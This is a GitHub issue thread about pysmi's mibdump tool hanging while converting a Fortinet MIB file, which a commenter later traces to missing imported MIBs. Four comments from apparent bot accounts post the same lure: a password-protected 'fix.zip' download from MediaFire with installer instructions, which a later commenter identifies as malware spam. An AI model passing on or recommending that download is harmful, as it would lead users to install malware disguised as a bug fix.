### ISSUE TITLE
mibdump tool hangs when processing MIB file

### ISSUE THREAD

**Issue by robmool** [lextudio/pysnmp#101]
### Expected behavior

The mibdump tool should finish within a reasonable time.

### Actual behavior

The mibdump tool hangs, it never finishes processing the MIB file. The mibdump tool consumes all the server CPU.

### Detailed steps

The first mibdump works fine
mibdump --mib-source='<dir>' --generate-mib-texts --destination-format pysnmp FORTINET-CORE-MIB.mib

The second next mibdump hangs, it never terminates. The mibdump consumes all the server CPU.
mibdump --mib-source='<dir>' --generate-mib-texts --destination-format pysnmp FORTINET-FORTIGATE-MIB.mib

### Python package information

pysmi-lextudio 1.4.3, pysnmp-lextudio 6.2.1, snmpclitools-lextudio 0.7.0    

### Operating system information

Linux Debian 12.6

### Python information

3.11.2

### (Optional) Contents of your test script

```python
Access to the MIB files:
https://drive.google.com/file/d/1GYu9o4e4wb05rPcgOF3IPk1TNzd6NXgF/view?usp=sharing
https://drive.google.com/file/d/1GVlBz5FGN3J1bM6o4cc2QZhdFr8qgUcY/view?usp=sharing
```

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by robmool** [comment]
The fix.zip file has a *.dll library for Windows. I am working on a Linux environment.  
I expected a fix with one or more Python files.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dcvmoole** [comment]
For what it is worth: I cannot reproduce your issue with pysmi 1.4.4 (which is functionally identical to 1.4.3). Both your MIBs are converted to Python code without problems. In order to satisfy their imports, I used the standard MIBs from net-snmp 5.9.3.

Could it be that you are missing some of the MIBs imported (only) by the FORTIGATE MIB, and that what you are experiencing is a problem with borrowing the MIBs from the (defunct) mibs.pysnmp.com website? I would not expect that to cause mibdump to use 100% CPU, but if your local environment causes such requests to end up in an infinite redirection loop.. who knows.

What do you get when you run mibdump with the --debug=all option?

> The fix.zip file has a *.dll library for Windows. I am working on a Linux environment.

Just for completeness: at the time, a wave of bots was posting malware links on newly created GitHub issues. What you saw was not a real answer.

**Comment by robmool** [comment]
I parsed the FORTIGATE MIBs again using the standard MIBs from net-snmp 5.9.3. This time with success!!
